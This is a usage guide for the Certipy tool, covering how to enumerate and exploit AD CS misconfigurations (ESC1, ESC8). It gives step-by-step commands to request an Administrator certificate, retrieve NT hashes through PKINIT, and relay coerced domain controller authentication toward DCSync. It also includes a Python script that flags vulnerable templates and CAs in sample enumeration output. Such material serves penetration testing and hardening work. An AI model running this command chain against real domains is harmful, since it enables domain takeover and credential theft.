Overview
Certipy is an offensive Python tool for enumerating and abusing Active Directory Certificate Services (AD CS) misconfigurations. Written by Oliver Lyak (ly4k), it implements the ESC escalation techniques described in the SpecterOps whitepaper "Certified Pre-Owned" (Schroeder and Christensen) and is the usual choice for exploiting them from a Linux host.
Key Features
- Enumerate AD CS instances, Certificate Authorities (CA), and templates.
- BloodHound-compatible output (a zip archive) for visual mapping of AD CS attack paths.
- Request and fetch certificates from misconfigured templates.
- Authenticate with requested, extracted, or forged certificates via PKINIT to obtain a Kerberos TGT and the account's NT hash.
- Exploit template and CA misconfigurations such as ESC1 through ESC4 and ESC8 (NTLM relay to web enrollment), among others.
Prerequisites
- Enumeration and certificate requests need a valid domain account (password, or an NTLM hash passed with -hashes). The ESC8 relay itself needs no credentials, only a network position that the coerced victim can reach.
Usage Examples
Enumeration
Enumerate CAs and templates and flag the ones Certipy considers vulnerable (ESC1, ESC8, and so on). By default find writes a text report, a JSON dump, and a BloodHound-compatible zip to the current directory; -vulnerable restricts the report to flagged objects.
# Basic enumeration dumping to the current directory
certipy find -u 'alice@target.local' -p 'Password123' -dc-ip 10.10.10.5 -vulnerable
# Output specifically for BloodHound
certipy find -u 'alice@target.local' -p 'Password123' -dc-ip 10.10.10.5 -bloodhound
Exploiting ESC1 (Template Misconfiguration)
ESC1 is a template that (1) can be enrolled by a low-privileged principal such as Domain Users, (2) grants the Client Authentication EKU, (3) lets the enrollee supply the subject (the ENROLLEE_SUPPLIES_SUBJECT flag, so the SAN is attacker-controlled), and (4) requires neither manager approval nor authorized signatures. With all four in place you can request a certificate bearing any UPN, e.g. the built-in Administrator.
# Request a certificate as Administrator from a vulnerable template (e.g., 'UserTemplate');
# the result is saved as administrator.pfx. Add -target <CA host> if the CA is not the DC.
certipy req -u 'alice@target.local' -p 'Password123' -dc-ip 10.10.10.5 -ca target-CA -template UserTemplate -upn 'administrator@target.local'
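The four ESC1 conditions above (plus the CA's web enrollment state for ESC8) are what certipy find -vulnerable evaluates. The following added example is my own code, not part of Certipy, and applies the same checks to a constructed JSON excerpt laid out like a certipy find -json dump. The key names ("Enrollee Supplies Subject", "Request Disposition", and so on) are an assumption modeled on the labels of Certipy's text report, so adjust them to the file your Certipy version actually writes. It also shows the edge cases that disqualify a template: manager approval, a non-attacker-controlled subject, and enrollment rights limited to privileged groups.

```python
import json

# Constructed sample in the shape of a `certipy find -json` dump. The key
# names are an assumption about Certipy's JSON schema (they mirror the labels
# of its text report); adjust them to the file your Certipy version writes.
SAMPLE_FIND_JSON = r"""
{
  "Certificate Authorities": {
    "0": {"CA Name": "target-CA", "DNS Name": "ca.target.local",
          "Web Enrollment": "Enabled", "Request Disposition": "Issue"},
    "1": {"CA Name": "target-SUB-CA", "DNS Name": "subca.target.local",
          "Web Enrollment": "Disabled", "Request Disposition": "Issue"}
  },
  "Certificate Templates": {
    "0": {"Template Name": "UserTemplate", "Enabled": true,
          "Client Authentication": true, "Enrollee Supplies Subject": true,
          "Requires Manager Approval": false, "Authorized Signatures Required": 0,
          "Certificate Authorities": ["target-CA"],
          "Permissions": {"Enrollment Permissions": {"Enrollment Rights": [
              "TARGET.LOCAL\\Domain Users", "TARGET.LOCAL\\Domain Admins"]}}},
    "1": {"Template Name": "ApprovedUser", "Enabled": true,
          "Client Authentication": true, "Enrollee Supplies Subject": true,
          "Requires Manager Approval": true, "Authorized Signatures Required": 0,
          "Certificate Authorities": ["target-CA"],
          "Permissions": {"Enrollment Permissions": {"Enrollment Rights": [
              "TARGET.LOCAL\\Domain Users"]}}},
    "2": {"Template Name": "Machine", "Enabled": true,
          "Client Authentication": true, "Enrollee Supplies Subject": false,
          "Requires Manager Approval": false, "Authorized Signatures Required": 0,
          "Certificate Authorities": ["target-CA"],
          "Permissions": {"Enrollment Permissions": {"Enrollment Rights": [
              "TARGET.LOCAL\\Domain Computers"]}}},
    "3": {"Template Name": "AdminOnly", "Enabled": true,
          "Client Authentication": true, "Enrollee Supplies Subject": true,
          "Requires Manager Approval": false, "Authorized Signatures Required": 0,
          "Certificate Authorities": ["target-CA"],
          "Permissions": {"Enrollment Permissions": {"Enrollment Rights": [
              "TARGET.LOCAL\\Domain Admins"]}}}
  }
}
"""

# Principals that any domain account (or machine) is a member of.
LOW_PRIV_PRINCIPALS = {"domain users", "authenticated users",
                       "domain computers", "everyone", "users"}


def load_find_output(text):
    """Parse the JSON dump into a dict."""
    return json.loads(text)


def _short_name(principal):
    # "TARGET.LOCAL\Domain Users" -> "domain users"
    return principal.rsplit("\\", 1)[-1].strip().lower()


def low_priv_enrollers(template):
    """Enrollment rights on the template held by low-privileged principals."""
    rights = (template.get("Permissions", {})
                      .get("Enrollment Permissions", {})
                      .get("Enrollment Rights", []))
    return [p for p in rights if _short_name(p) in LOW_PRIV_PRINCIPALS]


def issuing_cas(data):
    """Names of CAs that issue immediately. A 'Pending' disposition parks every
    request for a CA manager, which defeats ESC1 and ESC8 alike."""
    return {ca["CA Name"] for ca in data["Certificate Authorities"].values()
            if ca.get("Request Disposition", "Issue") == "Issue"}


def esc1_templates(data):
    """Templates meeting all ESC1 conditions and published on an issuing CA."""
    cas = issuing_cas(data)
    hits = []
    for t in data["Certificate Templates"].values():
        if (t.get("Enabled") and t.get("Client Authentication")
                and t.get("Enrollee Supplies Subject")
                and not t.get("Requires Manager Approval")
                and int(t.get("Authorized Signatures Required") or 0) == 0
                and low_priv_enrollers(t)
                and cas.intersection(t.get("Certificate Authorities", []))):
            hits.append(t["Template Name"])
    return hits


def esc8_cas(data):
    """Issuing CAs with the HTTP web enrollment endpoint enabled (relay target)."""
    cas = issuing_cas(data)
    return [ca["CA Name"] for ca in data["Certificate Authorities"].values()
            if ca.get("Web Enrollment") == "Enabled" and ca["CA Name"] in cas]


if __name__ == "__main__":
    data = load_find_output(SAMPLE_FIND_JSON)
    print("ESC1 templates:", esc1_templates(data))
    print("ESC8 CAs:", esc8_cas(data))
```

Only UserTemplate survives the checks: ApprovedUser needs manager approval, Machine does not let the enrollee choose the subject, and AdminOnly is enrollable only by Domain Admins. Treat the result as a shortlist to confirm with certipy req, since a real dump carries more fields (EKU lists, CA-level EDITF_ATTRIBUTESUBJECTALTNAME2, enrollment agent restrictions) than this excerpt models.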
Authentication (PKINIT)
Once you have the .pfx from a request or forgery, certipy auth uses it for PKINIT to obtain a Kerberos TGT for the account named in the certificate, saves the TGT as a .ccache, and then uses it to retrieve the account's NT hash.
# Authenticate using the requested Administrator certificate
certipy auth -pfx administrator.pfx -dc-ip 10.10.10.5
The command prints the NT hash, which feeds Pass-the-Hash tooling such as wmiexec.py, and the saved .ccache can be used directly with Kerberos-aware tools by exporting KRB5CCNAME. If the certificate carries no UPN, supply -username and -domain explicitly.
Exploiting ESC8 (Web Enrollment NTLM Relay)
If the CA has the Web Enrollment role installed and its HTTP endpoint (/certsrv) accepts NTLM authentication without requiring HTTPS and Extended Protection for Authentication, a coerced NTLM authentication can be relayed to it to enroll a certificate in the victim's name.
# Run Certipy's relay server, targeting the CA
certipy relay -target http://10.10.10.6/certsrv -template DomainController
You would then use a tool like Coercer or PetitPotam to force the target Domain Controller to authenticate to your Certipy relay server. The relay listens for inbound SMB authentication on TCP 445, so run it as root and make sure nothing else is bound to that port. The relayed DC machine account is enrolled in the DomainController template; authenticating with the resulting .pfx via certipy auth yields the DC's TGT and NT hash, which is sufficient for DCSync.